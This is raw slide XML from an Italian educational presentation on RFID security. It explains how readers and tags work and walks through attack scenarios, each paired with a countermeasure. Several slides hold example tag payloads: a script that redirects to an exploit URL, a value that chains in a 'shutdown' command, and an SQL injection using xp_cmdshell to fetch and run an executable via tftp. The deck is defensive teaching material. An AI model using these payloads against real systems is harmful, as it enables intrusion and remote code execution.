          <p:cNvPr id="6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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Contromisure:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243804" y="2750108"/>
            <a:ext cx="3212299" cy="3260561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Utilizzare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0"/>
              <a:t>linguaggi di alto livello per il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0" err="1"/>
              <a:t>middleware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" b="1" dirty="0"/>
              <a:t>JAVA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="1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779463" y="2323432"/>
            <a:ext cx="7583488" cy="4058264"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>RFID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Radio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Frequency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>) è una tecnologia per la identificazione automatica di oggetti, animali o persone  basata sulla capacità di memorizzare e accedere a distanza a tali dati usando dispositivi elettronici (chiamati TAG o transponder) che sono in grado di rispondere comunicando le informazioni in essi contenute quando "interrogati".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Per RFID quindi si intende una tecnologia per l’identificazione wireless. “un equivalente dei codici a barre, ma via radio”, pertanto leggibile da remoto e senza contatto visivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1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Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Insertion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>ross code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79463" y="2720788"/>
            <a:ext cx="4119708" cy="326056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 err="1"/>
              <a:t>middleware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>utilizza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>un componente web-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smtClean="0"/>
              <a:t>per un login dell’utente dove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e\o password risiedano in un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag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err="1"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>rfid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>potrebbe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>contenere </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>seguente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>codice di esempio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>='http://ip/exploit.wmf';&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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779463" y="1852426"/>
            <a:ext cx="3666702" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Scenario di Attacco:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Contromisure:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243804" y="2706765"/>
            <a:ext cx="3212299" cy="3260561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>alidare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>gli input prima di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t>utilizzarli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820303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Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>: SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection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79463" y="2720788"/>
            <a:ext cx="4119708" cy="3260561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Un sistema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>middleware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>che legga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> RFID in un magazzino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query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> al DB potrebbe essere: «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>Merce: &lt;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</a:rPr>
              <a:t>READ TAG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>» </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Supponiamo un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>rfid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> con: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>«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Oggetto;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shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(supponiamo che ; sia il carattere per concatenare comandi)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" i="1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779463" y="1852426"/>
            <a:ext cx="3666702" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Scenario di Attacco:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Contromisure:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243804" y="2706765"/>
            <a:ext cx="3212299" cy="3260561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>alidare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>il codice prima di fare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>query</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Sostituire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>i caratteri pericolosi con equivalenti caratteri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t>innocui</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Utilizzare (ad esempio nel java) i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>PreparedStatement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412418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61616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Virus/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Worm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79463" y="295833"/>
            <a:ext cx="4300752" cy="598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Threat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79463" y="2720788"/>
            <a:ext cx="4119708" cy="3260561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Nei pochi kb di un Tag si possono creare dei comandi malevoli che sfruttino delle falle del sistema ad esempio:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" smtClean="0"/>
              <a:t> « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xpcmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% GET myexploit.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Che</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLServer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shell di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scarica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> un exploit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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>remoto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> e lo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>esegue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Virus di pochi kb </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="1800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779463" y="1852426"/>
            <a:ext cx="3666702" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Scenario di Attacco:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto testo 11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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Contromisure:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243804" y="2706765"/>
            <a:ext cx="3212299" cy="3260561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Cifrare l’ RFID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1310883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315794" y="2966422"/>
            <a:ext cx="6623660" cy="283595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La tecnologia RFID potenzialmente è capace di modificare sensibilmente le nostre abitudini grazie alla semplicità, all’economicità e all’infinità di utilizzi che la contraddistinguono.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Come ogni sistema informatico, però non è immune a falle ed è bene valutarle e prevenirle.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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503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Conclusioni - Domande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61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79461" y="557619"/>
            <a:ext cx="7583488" cy="69533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 Sistema RFID è formato da un Lettore e un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tag</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5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Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> RFID (detto anche transponder) e' un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>microchip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>che contiene </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>dati </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>un numero univoco universale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>e grazie ad un' antenna integrata può ricevere e trasmettere radiofrequenza ad un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tranreceiver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>RFID. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Questo componente elettronico ha l'aspetto di una etichetta adesiva e può essere grande anche solo pochi millimetri.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7" name="Immagine 6" descr="FileEPC-RFID-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1" y="1981201"/>
            <a:ext cx="2072677" cy="172013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69" y="4041675"/>
            <a:ext cx="2273300" cy="22733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79461" y="557619"/>
            <a:ext cx="7583488" cy="69533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 Sistema RFID è formato da un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lettore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t> e un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Tag</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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779461" y="2249649"/>
            <a:ext cx="3657600" cy="39751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Il Lettore emette un campo elettromagnetico/elettrico che, che tramite il principio della induzione, lo trasforma in energia elettrica, che alimenta il microchip. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Il chip così attivato trasmette i dati in esso contenuti tramite un’antenna all'apparato che riceve i dati. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\{_oXoRy_}\Desktop\sic rfid\07052010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7" y="2519802"/>
            <a:ext cx="4056724" cy="308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Classificazione ISO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779461" y="2866778"/>
            <a:ext cx="3657600" cy="3213100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125/134 kHz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>13,56 MHz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>868/915 MHz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>&gt;2,4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>GHz</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean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Classificazione sicurezza/tecnologia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>
          <a:xfrm>
            <a:off x="4705351" y="2866778"/>
            <a:ext cx="3657600" cy="32131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Classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> passivi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Classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> Once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> - passivi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Classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> - passivi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Classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
